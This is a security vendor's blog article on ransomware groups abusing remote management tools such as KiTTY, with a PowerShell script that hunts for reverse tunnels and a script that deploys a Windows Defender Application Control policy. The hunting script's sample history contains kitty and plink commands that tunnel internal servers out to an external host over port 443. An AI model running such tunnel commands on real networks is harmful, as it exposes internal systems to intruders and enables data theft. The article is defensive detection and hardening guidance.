As more people work remotely, IT departments must manage devices spread across cities and countries, relying on VPNs and remote monitoring and management (RMM) tools for system administration.
However, like any administrative technology, RMM tools can also be used maliciously: a threat actor who controls one can connect to a victim's device, run commands, steal data, and remain undetected.
This article will look at real-world examples of RMM exploits and show you how to protect your organization against these attacks.
What are RMM tools?
RMM software simplifies network management by allowing IT professionals to remotely troubleshoot problems, install software, and upload or download files to or from devices.
Attackers have long used malware to connect their own servers to a victim's device. Because such connections are comparatively easy to detect, ransomware-as-a-service (RaaS) groups have had to adjust their methods.
In most of the incidents Varonis investigated last year, RaaS gangs used a technique known as living off the land: using legitimate IT tools to gain remote control, move through the network undetected, and steal data.
RMM tools allow attackers to blend in and evade detection. The tools and their traffic are typically ignored by an organization's security controls and policies, such as application allow-listing (whitelisting), because they are expected to be there.
This tactic also helps script kiddies: once they plug in, everything they need is already installed and ready for them.
Our research revealed two main methods that attackers use to manipulate RMM tools:
- Abuse of existing RMM tools: Attackers gain initial access to an organization’s network using pre-existing RMM tools. They use weak or default credentials or tool vulnerabilities to gain access without triggering detection.
- Installing new RMM tools: Attackers install their preferred RMM tools by first gaining access to the network. They use phishing emails or social engineering techniques to get victims to unwittingly install the RMM tool on their network.
[Table: Common RMM tools and RaaS groups]
Real-life examples of RMM exploits
During a recent investigation, our Managed Data Detection and Response (MDDR) team analyzed the organization's data and found evidence of a tool called "KiTTY" in the PowerShell history of the compromised device.
KiTTY is a modified version of PuTTY, a well-known client for opening Telnet and SSH sessions to remote machines. Because PuTTY is a legitimate administration tool, none of the organization's security software flagged it, and KiTTY was used to create reverse tunnels over port 443 that exposed internal servers to an attacker-controlled AWS EC2 instance.
The Varonis team conducted a comprehensive analysis. The KiTTY sessions to the EC2 instance were key to establishing what happened, how it was done, and, most importantly, which files were stolen.
This evidence became the turning point of the investigation and allowed the entire attack chain to be traced. It also revealed gaps in the organization's security, how to close them, and the potential consequences of the attack.
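The pattern in the investigation above (a PuTTY-family client opening a reverse tunnel on port 443) can be hunted for in PSReadLine command history. The following is an added example written for this article, not Varonis code or a tool from the incident; the client names it looks for, the sample history lines and the per-user history path are assumptions, and the sample lines are constructed, not real incident data.

```powershell
# Added example: hunt PSReadLine history for PuTTY/KiTTY/plink invocations that set up a
# reverse tunnel (-R) or hide the session inside the HTTPS port (-P 443 / :443).
function Find-ReverseTunnelCommands {
    param([string[]]$HistoryLines, [string]$Source = 'constructed')

    # PuTTY-family clients. -R = remote port forward, which exposes an internal host to the
    # SSH server the client connected to; -L (local forward) is the opposite, benign direction.
    $clientRe  = '(?i)\b(putty|kitty|kitty_portable|plink)(\.exe)?\b'
    $reverseRe = '(?i)(^|\s)-R\s+[\w.\[\]:*-]*:\d+'      # -R [bind:]port:host:port
    $port443Re = '(?i)(\s-P\s+443\b|:443\b)'

    foreach ($line in $HistoryLines) {
        if ($line -notmatch $clientRe) { continue }
        $flags = @()
        if ($line -match $reverseRe) { $flags += 'ReverseTunnel' }
        if ($line -match $port443Re) { $flags += 'Port443' }
        if ($flags.Count -eq 0) { continue }
        [pscustomobject]@{
            Source  = $Source
            Command = $line.Trim()
            Flags   = ($flags -join ',')
        }
    }
}

# Constructed sample history (not real incident data). Lines 2 and 3 are what a reverse
# tunnel from a workstation to an internet host looks like; line 4 is a benign local forward.
$sampleHistory = @(
    'Get-ChildItem C:\Users\jdoe\Downloads',
    'C:\Tools\kitty.exe -ssh ops@203.0.113.10 -P 443 -R 3389:fileserver01:3389',
    'plink.exe -ssh -P 443 -N -R 8443:10.0.0.15:443 ops@203.0.113.10 -pw hunter2',
    'putty.exe -ssh admin@jumpbox.corp.example -L 5900:kvm01:5900',
    'Get-Process | Where-Object CPU -gt 100'
)

# Expected: two hits, the kitty.exe line (ReverseTunnel,Port443) and the plink.exe line.
Find-ReverseTunnelCommands -HistoryLines $sampleHistory | Format-Table -AutoSize

# Run the same check over every local profile's PSReadLine history (assumed default path).
Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
    ForEach-Object { Find-ReverseTunnelCommands -HistoryLines (Get-Content $_.FullName) -Source $_.FullName }
```

History files are easy for an attacker to clear, so treat a hit as a starting point and corroborate it with process-creation events (Security 4688 with command-line auditing, or Sysmon event 1) and with outbound connections to port 443 from processes that are not browsers.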
Strategies to protect against RMM tool abuse
Consider implementing the following strategies to reduce the likelihood of attackers abusing RMM tools.
Application Control Policy
Limit your organization to a single approved RMM tool by introducing an application control policy:
- Ensure that the approved RMM tool is updated, patched, and accessible only to authorized users with MFA enabled
- Proactively block inbound and outbound connections on the ports and protocols used by unapproved RMM tools at the network perimeter
One option is to create a Windows Defender Application Control (WDAC) policy using PowerShell that whitelists applications based on their publisher. It is important to note that creating WDAC policies requires administrative privileges, and deploying them via Group Policy requires domain administrative privileges.
As a precaution, you should test the policy in audit mode before deploying it in force mode to avoid inadvertently blocking essential programs.
- Open PowerShell with administrator rights
- Create a new policy: You can create a policy with the New-CIPolicy cmdlet. It scans a directory you specify and produces a policy that allows the files found there (executables, DLLs, and so on) to run.
For example, to allow everything signed by the publisher of a particular application, scan the directory that contains it:
New-CIPolicy -FilePath "C:\Path\To\Policy.xml" -ScanPath "C:\Path\To\Application" -Level Publisher -Fallback Hash -UserPEs
In this command, -ScanPath is the directory to scan, -Level Publisher means the policy will allow anything signed by the same publisher as the scanned binaries, -UserPEs includes user-mode executables (without it only kernel-mode drivers are covered), and -Fallback Hash means that an unsigned file is allowed by its hash instead.
Note that -FilePath is where the policy XML is written, not the path to the application. New policies start in audit mode (rule option 3, "Enabled:Audit Mode"); you can set or remove that option with Set-RuleOption -FilePath "C:\Path\To\Policy.xml" -Option 3 (add -Delete to switch to enforcement).
- Convert the policy to binary format: WDAC policies must be deployed in binary form. Convert the XML with the ConvertFrom-CIPolicy cmdlet: ConvertFrom-CIPolicy -XmlFilePath "C:\Path\To\Policy.xml" -BinaryFilePath "C:\Path\To\Policy.bin"
- Deploy the policy: For a single machine, copy the binary to C:\Windows\System32\CodeIntegrity\SIPolicy.p7b (the file name matters for single-policy format) and reboot. To deploy at scale, use the Group Policy Management Console (GPMC): under Computer Configuration → Administrative Templates → System → Device Guard, enable the "Deploy Windows Defender Application Control" setting and enter the path to the policy binary (a UNC share works). The Group Policy method only supports the single-policy format.
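The steps above as one script, added here as an example and not code from the original article or from Varonis. It builds a publisher-based allow policy for a sanctioned RMM client, merges it with Microsoft's AllowMicrosoft template (shipped under C:\Windows\schemas\CodeIntegrity\ExamplePolicies) so that Windows itself stays allowed once enforcement is on, starts in audit mode, converts the result to binary and deploys it locally. The folder names and paths are assumptions; run it from an elevated PowerShell session on a reference machine.

```powershell
# Added example: end-to-end WDAC policy build and local deployment for one approved RMM tool.
#Requires -RunAsAdministrator

$RmmDir    = 'C:\Program Files\ApprovedRMM'                          # assumed: sanctioned RMM client folder
$WorkDir   = 'C:\WDAC'                                               # assumed working directory
$AppXml    = Join-Path $WorkDir 'RmmPublisher.xml'
$BaseXml   = "$env:SystemRoot\schemas\CodeIntegrity\ExamplePolicies\AllowMicrosoft.xml"
$MergedXml = Join-Path $WorkDir 'RmmAllowPolicy.xml'
$PolicyBin = Join-Path $WorkDir 'RmmAllowPolicy.bin'
$Deployed  = "$env:SystemRoot\System32\CodeIntegrity\SIPolicy.p7b"   # required name for single-policy format

New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null

# 1. Scan the RMM folder. Signed files become publisher rules (anything else signed by the same
#    publisher is allowed too); unsigned files fall back to hash rules. -UserPEs covers
#    user-mode executables, not only drivers.
New-CIPolicy -FilePath $AppXml -ScanPath $RmmDir -Level Publisher -Fallback Hash -UserPEs

# 2. Merge with the AllowMicrosoft template. A policy that allows only the RMM publisher would
#    also block Windows components once enforced, leaving the machine unusable.
Merge-CIPolicy -OutputFilePath $MergedXml -PolicyPaths $BaseXml, $AppXml | Out-Null

# 3. Audit mode first: rule option 3 logs what would be blocked without blocking it.
Set-RuleOption -FilePath $MergedXml -Option 3

# 4. Convert to the binary form the kernel loads, then deploy locally (takes effect after reboot).
ConvertFrom-CIPolicy -XmlFilePath $MergedXml -BinaryFilePath $PolicyBin | Out-Null
Copy-Item -Path $PolicyBin -Destination $Deployed -Force
Write-Host "Audit-mode policy deployed to $Deployed; reboot to activate."

# 5. After a reboot, review what audit mode would have blocked before enforcing.
#    Code Integrity event ID 3076 = audit-mode block, 3077 = enforced block.
function Get-WdacAuditBlocks {
    param([int]$Newest = 50)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-CodeIntegrity/Operational'; Id = 3076 } `
        -MaxEvents $Newest -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

# 6. Only once the audit log shows nothing business-critical being blocked: remove option 3,
#    rebuild the binary and redeploy to switch the policy to enforcement.
function Enable-WdacEnforcement {
    Set-RuleOption -FilePath $MergedXml -Option 3 -Delete
    ConvertFrom-CIPolicy -XmlFilePath $MergedXml -BinaryFilePath $PolicyBin | Out-Null
    Copy-Item -Path $PolicyBin -Destination $Deployed -Force
}
```

Leave the policy in audit mode for long enough to cover the organization's normal cycle of software use (patch days, month-end tools) before calling Enable-WdacEnforcement; a block that surfaces only after enforcement is far more disruptive than one caught as a 3076 event.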
Constant monitoring
Monitor network traffic and logs, with particular attention to RMM tools. Consider a service such as Varonis MDDR, which provides 24x7x365 monitoring and behavioral analysis.
User training and awareness
Train your employees to recognize phishing attempts and to practice good password management, since manipulating users is a common way attackers gain access to your network. Encourage reporting of suspicious activity and regularly review potential risks with your cybersecurity team.
Reduce your risk without taking any.
As technology advances, it gives both defenders and attackers an advantage, and RMM tools are just one example of the potential threats organizations face.
At Varonis, our mission is to protect what matters most: your data. Our all-in-one data security platform continuously discovers and classifies critical data, reduces exposure, and stops threats in real time with AI-powered automation.
Curious about the risks present in your environment? Get a Varonis Data Risk Assessment today.
Our free assessment only takes a few minutes to set up and provides immediate benefits. In less than 24 hours, you’ll have a clear, risk-based view of your most critical data and a clear path to automated remediation.
Note: This article originally appeared on the Varonis blog.